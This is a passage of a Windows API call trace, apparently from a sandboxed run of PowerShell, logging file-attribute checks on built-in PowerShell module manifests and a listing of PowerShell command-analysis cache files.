ftCreationTime.dwLowDateTime=0x137c5d65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137c5d65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137c5d65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1937)) returned 1 [0154.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1", lpFilePart=0x0) returned 0x3f [0154.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TLS\\TLS.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\tls\\tls.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d5c6b0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d5c6b0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d5c6b0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x28c)) returned 1 [0154.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0154.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x208fc045, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x208fc045, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x208fc045, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x44a)) returned 1 [0154.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1", lpFilePart=0x0) returned 0x63 [0154.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TrustedPlatformModule\\TrustedPlatformModule.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\trustedplatformmodule\\trustedplatformmodule.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1420df86, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1420df86, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1420df86, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x27b)) returned 1 [0154.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1", lpFilePart=0x0) returned 0x4b [0154.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient\\vpnclient.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6c5cd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfb6c5cd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfb6c5cd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x611)) returned 1 [0154.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1", lpFilePart=0x0) returned 0x41 [0154.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Wdac\\Wdac.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\wdac\\wdac.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192ab6aa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x192ab6aa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x192ab6aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2bd0)) returned 1 [0154.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1", lpFilePart=0x0) returned 0x67 [0154.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsdeveloperlicense\\windowsdeveloperlicense.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19212d44, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x19212d44, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x19212d44, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x235)) returned 1 [0154.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1", lpFilePart=0x0) returned 0x63 [0154.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27635a90, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x27635a90, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x27635a90, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6)) returned 1 [0154.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1", lpFilePart=0x0) returned 0x63 [0154.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27635a90, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x27635a90, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x27635a90, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c2)) returned 1 [0154.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1", lpFilePart=0x0) returned 0x53 [0154.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsSearch\\WindowsSearch.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowssearch\\windowssearch.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2013c61b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2013c61b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2013c61b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b1)) returned 1 [0154.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1", lpFilePart=0x0) returned 0x53 [0154.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate\\windowsupdate.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19212d44, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x19212d44, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x19212d44, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7b2)) returned 1 [0154.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e380) returned 1 [0154.237] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xafa508de60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0154.237] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_*"), lpFindFileData=0xafa508e090 | out: lpFindFileData=0xafa508e090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47e2e2ca, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e2e2ca, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x32eaf137, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x25a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_01c28806-e5ae-41cc-b284-e627e1b02beb", cAlternateFileName="PODA56~1")) returned 0x2386d3b4ef0 [0154.243] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c4627f, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x34c4627f, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x34c4627f, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x1320, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_0b3c1d81-1037-4688-8043-37ef0496d1b1", cAlternateFileName="PO24C8~1")) returned 1 [0154.245] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38a8fa22, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x38a8fa22, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38a8fa22, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x6b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_170f79fd-23fa-42c0-ba91-f8b4685aa133", cAlternateFileName="PO595D~1")) returned 1 [0154.245] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38be6eb6, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x38be6eb6, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38be6eb6, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_1c6b2faf-cb6d-46b7-8c8d-1404fbd421e3", cAlternateFileName="PO6EC6~1")) returned 1 [0154.245] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37a77c6a, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37a77c6a, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37a77c6a, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_1c9e79f5-9b2e-4651-9efa-1660f59b3721", cAlternateFileName="POC717~1")) returned 1 [0154.246] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93910e6, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb93910e6, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb9394c19, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_1cc363fc-fd33-403d-b8fa-964af616746c", cAlternateFileName="PO8435~1")) returned 1 [0154.246] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37aea10d, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37aea10d, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37aea10d, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x5f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_1f6d952e-955d-4251-b4ed-c30801ca518c", cAlternateFileName="PO7E0D~1")) returned 1 [0154.246] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x382114d8, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x382114d8, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x382114d8, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x31a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_2363a9f5-d264-46cf-828e-a796c53f0f3e", cAlternateFileName="PO8407~1")) returned 1 [0154.246] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37aea10d, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37aea10d, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37aea10d, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x5f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_243cb1c0-bacb-4448-835b-dda604eeba4d", cAlternateFileName="POF5A0~1")) returned 1 [0154.247] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x378d4046, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x378d4046, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x378d4046, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x386, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_2764c4b8-1d23-4fe0-80ff-c5f25b01ad9f", cAlternateFileName="PO847A~1")) returned 1 [0154.247] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38b02011, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x38b02011, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38b02011, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_2dba82a7-5c65-49de-bfba-b0bc6d1cca90", cAlternateFileName="POA3A5~1")) returned 1 [0154.247] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb92f9afe, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb92f9afe, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb92faecd, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_2fb762b4-d05f-41c9-800e-eb1b344a91c2", cAlternateFileName="PO4F91~1")) returned 1 [0154.247] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d9547, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x324d9547, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x324d9547, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xc70, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_33444789-cd00-42ba-bf29-1384e5f0bf9d", cAlternateFileName="POF245~1")) returned 1 [0154.248] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37de520f, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37de520f, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37de520f, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x31e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_391cd37b-624e-47dc-a897-4591943c1c7b", cAlternateFileName="POD595~1")) returned 1 [0154.248] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3622db99, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x3622db99, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x3622db99, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x3e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_4180383b-48fd-4ae0-9098-bcd92eb4ae22", cAlternateFileName="POA0DD~1")) returned 1 [0154.248] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b6b93d, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xb9b6b93d, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xb9b6ccc5, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_460645de-0b19-4be1-bf3e-f69457b02cf0", cAlternateFileName="PO35F7~1")) returned 1 [0154.249] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35831db1, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x35831db1, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35831db1, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xf2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_4717f4b3-3673-46e3-b1f9-2bf1aaf20c2a", cAlternateFileName="PO4D63~1")) returned 1 [0154.249] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f7f0a8, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x35f7f0a8, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x35f7f0a8, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x74f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_49c2cdc0-d5ed-4d06-b954-3793b8c3cc72", cAlternateFileName="POEA2D~1")) returned 1 [0154.249] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c33397, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x38c33397, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x38c33397, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0x255, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_4d3b6290-6b6f-4cc7-b789-af5687823384", cAlternateFileName="PO6D07~1")) returned 1 [0154.252] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37671a5b, ftCreationTime.dwHighDateTime=0x1d93628, ftLastAccessTime.dwLowDateTime=0x37671a5b, ftLastAccessTime.dwHighDateTime=0x1d93628, ftLastWriteTime.dwLowDateTime=0x37671a5b, ftLastWriteTime.dwHighDateTime=0x1d93628, nFileSizeHigh=0x0, nFileSizeLow=0xa6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShell_AnalysisCacheEntry_50139d5e-d50b-42d0-afe1-b42b77bc31c6", cAlternateFileName="PO79F2~1")) returned 1 [0154.252] FindNextFileW (in: hFindFile=0x2386d3b4ef0, lpFindFileData=0xafa508e120 | out: lpFindFileData=0xafa508e120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d1cbf7, ftCreationTime.dwHighDateTime=0x1d93628, 